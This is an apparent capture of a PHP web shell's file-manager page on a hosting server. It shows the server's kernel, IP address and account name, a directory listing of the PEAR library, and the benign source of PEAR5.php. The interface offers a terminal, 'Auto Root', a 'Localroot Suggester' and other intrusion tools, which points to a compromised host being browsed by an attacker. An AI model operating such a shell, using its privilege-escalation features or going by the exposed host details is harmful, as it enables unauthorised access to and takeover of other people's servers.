Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php53 /
usr /
share /
pear /
Delete
Unzip
Name
Size
Permission
Date
Action
.channels
[ DIR ]
drwxr-xr-x
2025-08-15 19:27
.pkgxml
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
.registry
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
Archive
[ DIR ]
drwxr-xr-x
2025-08-15 19:27
Auth
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
Console
[ DIR ]
drwxr-xr-x
2025-08-15 19:27
Mail
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
Net
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
OS
[ DIR ]
drwxr-xr-x
2025-08-15 19:27
PEAR
[ DIR ]
drwxr-xr-x
2025-08-15 19:27
Structures
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
Symfony
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
XML
[ DIR ]
drwxr-xr-x
2025-08-15 19:27
data
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
ezc
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
test
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
.depdb
12.91
KB
-rw-r--r--
2025-08-15 19:29
.depdblock
0
B
-rw-r--r--
2025-08-15 19:29
.filemap
383.27
KB
-rw-r--r--
2025-08-15 19:29
.lock
0
B
-rw-r--r--
2025-08-15 19:29
Mail.php
9.65
KB
-rw-r--r--
2024-07-17 10:11
PEAR.php
33.06
KB
-rw-r--r--
2024-07-17 10:08
PEAR5.php
1.06
KB
-rw-r--r--
2024-07-17 10:08
System.php
20.34
KB
-rw-r--r--
2024-07-17 10:08
pearcmd.php
14.2
KB
-rw-r--r--
2024-07-17 10:08
peclcmd.php
1.01
KB
-rw-r--r--
2024-07-17 10:08
Save
Rename
<?php /** * This is only meant for PHP 5 to get rid of certain strict warning * that doesn't get hidden since it's in the shutdown function */ class PEAR5 { /** * If you have a class that's mostly/entirely static, and you need static * properties, you can use this method to simulate them. Eg. in your method(s) * do this: $myVar = &PEAR5::getStaticProperty('myclass', 'myVar'); * You MUST use a reference, or they will not persist! * * @access public * @param string $class The calling classname, to prevent clashes * @param string $var The variable to retrieve. * @return mixed A reference to the variable. If not set it will be * auto initialised to NULL. */ static function &getStaticProperty($class, $var) { static $properties; if (!isset($properties[$class])) { $properties[$class] = array(); } if (!array_key_exists($var, $properties[$class])) { $properties[$class][$var] = null; } return $properties[$class][$var]; } }